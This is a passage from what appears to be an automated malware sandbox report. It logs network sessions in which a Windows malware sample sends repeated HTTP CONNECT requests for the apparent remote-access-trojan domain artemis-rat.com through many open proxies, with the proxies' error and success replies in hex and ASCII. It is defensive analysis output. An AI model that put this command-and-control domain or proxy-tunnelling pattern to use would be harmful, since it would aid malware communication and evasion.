74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              443192.168.2.450541122.116.150.290007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.945014954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              444192.168.2.45136838.162.3.20331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.945135117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.375718117 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              445192.168.2.451208103.118.46.17780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.946135044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              446192.168.2.45125945.233.2.141537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.949572086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              447192.168.2.451275219.243.212.11880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.953144073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.279695988 CET22INHTTP/1.1 502 ERROR


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              448192.168.2.451459172.67.182.118807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.953315973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.107347012 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              449192.168.2.45123243.255.113.232827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.953807116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.663053036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858499050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054136038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.246897936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.601061106 CET208INHTTP/1.0 404 Not Found
                                              Server: HCS
                                              Date: Mon, 11 Mar 2024 10:24:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 432
                                              HCS-Error: ERR_FTP_NOT_FOUND 0
                                              X-NGAA: MISS from CH-XW-NO1-315.2
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              450192.168.2.45139972.52.131.65807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.956845045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.169872999 CET830INHTTP/1.1 400 Bad Request
                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                              Pragma: no-cache
                                              Content-Type: text/html
                                              Content-Length: 591
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: LiteSpeed
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              451192.168.2.45138938.162.9.10331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.958373070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.437402964 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              452192.168.2.451464185.162.230.201807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.043909073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.198206902 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              453192.168.2.451468104.21.80.83807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.043961048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.198293924 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              454192.168.2.45133924.249.199.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044229984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              455192.168.2.45095365.169.38.73265927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044462919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              456192.168.2.451471104.21.124.121807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044480085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.198780060 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              457192.168.2.451209103.127.1.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044681072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              458192.168.2.450502103.179.253.20281817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044806957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.770991087 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              459192.168.2.45131054.223.49.28326507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044935942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.683475018 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              460192.168.2.45053145.11.95.16660057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.044996977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              461192.168.2.451281218.6.120.11177777284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.045444012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              462192.168.2.45144438.162.22.4331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.045646906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.460930109 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              463192.168.2.450466103.115.242.19280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.045870066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069586039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              464192.168.2.450692162.241.53.72574957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.046274900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069585085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070436001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.163430929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.257045984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              465192.168.2.45149545.12.31.3807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.046536922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.201076031 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              466192.168.2.45143072.217.216.23941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.047154903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
